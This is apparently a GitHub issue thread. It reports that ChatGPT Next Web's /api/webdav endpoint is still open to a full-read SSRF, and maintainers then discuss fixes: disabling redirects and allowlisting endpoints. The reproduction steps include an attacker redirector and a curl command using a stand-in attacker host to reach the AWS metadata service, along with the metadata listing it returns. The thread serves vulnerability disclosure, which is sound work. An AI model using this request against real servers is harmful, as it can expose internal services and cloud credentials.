[Bug] Release v211.3 Still Vulnerable to Full-Read SSRF CVE-2023-49785

[nvn1729]

Bug Description

The v2.11.3 release removed the /api/cors endpoint but added a new /api/webdav endpoint. This new endpoint is also vulnerable to full-read SSRF.

Steps to Reproduce

Let's call the attacker IP "attacker-ip", and the vulnerable ChatGPT Next Web target ip "target-ip".

An attacker would first set up a http redirector on their IP. This redirector will respond to HTTP requests by returning a HTTP redirect with the Location header set to an endpoint in the internal network of the "target-ip".

For instance, let's say the redirector is running on port 46732 on the "attacker-ip" and it's set up to redirect to http://169.254.169.254/latest/meta-data (AWS metadata service).

Then the attacker makes a request to the webdav endpoint that looks like this:

curl --path-as-is 'http://target-ip:3000/api/webdav/a:/chatgpt-next-web/backup.json?endpoint=http://<attacker-ip>:46732'

The /api/webdav handler will fetch "http://attacker-ip:46732/a:/chatgpt-next-web/backup.json", which will then redirect to http://169.254.169.254/latest/meta-data, resulting in the attacker getting an output like this:

ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hibernation/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
system

Expected Behavior

the right solution is to allow the user to configure the webdav urls in server-side config, and for the application to only allow access to those URLs. Redirects could be disabled but it'd still be vulnerable to blind SSRF.

Screenshots

No response

Deployment Method

• Docker
• Vercel
• Server

Desktop OS

No response

Desktop Browser

No response

Desktop Browser Version

No response

Smartphone Device

No response

Smartphone OS

No response

Smartphone Browser

No response

Smartphone Browser Version

No response

Additional Logs

No response

[H0llyW00dzZ]

Bug Description

The v2.11.3 release removed the /api/cors endpoint but added a new /api/webdav endpoint. This new endpoint is also vulnerable to full-read SSRF.

Steps to Reproduce

Let's call the attacker IP "attacker-ip", and the vulnerable ChatGPT Next Web target ip "target-ip".

An attacker would first set up a http redirector on their IP. This redirector will respond to HTTP requests by returning a HTTP redirect with the Location header set to an endpoint in the internal network of the "target-ip".

For instance, let's say the redirector is running on port 46732 on the "attacker-ip" and it's set up to redirect to http://169.254.169.254/latest/meta-data (AWS metadata service).

Then the attacker makes a request to the webdav endpoint that looks like this:

curl --path-as-is 'http://target-ip:3000/api/webdav/a:/chatgpt-next-web/backup.json?endpoint=http://<attacker-ip>:46732'

The /api/webdav handler will fetch "http://attacker-ip:46732/a:/chatgpt-next-web/backup.json", which will then redirect to http://169.254.169.254/latest/meta-data, resulting in the attacker getting an output like this:

ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
events/
hibernation/
hostname
iam/
identity-credentials/
instance-action
instance-id
instance-life-cycle
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
system

Expected Behavior

the right solution is to allow the user to configure the webdav urls in server-side config, and for the application to only allow access to those URLs. Redirects could be disabled but it'd still be vulnerable to blind SSRF.

Screenshots

No response

Deployment Method

• Docker
• Vercel
• Server

Desktop OS

No response

Desktop Browser

No response

Desktop Browser Version

No response

Smartphone Device

No response

Smartphone OS

No response

Smartphone Browser

No response

Smartphone Browser Version

No response

Additional Logs

No response

does it still affected with this latest commits (unreleased) c0c54e5 ?

[H0llyW00dzZ]

waiting for the info..

[nvn1729]

haven't tested the latest but from the code it appears to be affected. the attacker fully controls the endpoint the server reaches out to, and the server can be redirected back to arbitrary internal URLs.

[fred-bf]

I'll patch a separate version to disable redirect, @nvn1729 do you have any other suggestions?

[fred-bf]

merged in #4381

[nvn1729]

One approach is for the user to define an allowlist of webdav endpoints in server-side config, and the webdav API should only allow access to those specific endpoints.

Disabling redirects helps but it'll still leave the app vulnerable to blind SSRF.

[Dean-YZG]

We will solve this problem by whitelisting webdav endpoints

[Dean-YZG]

#4479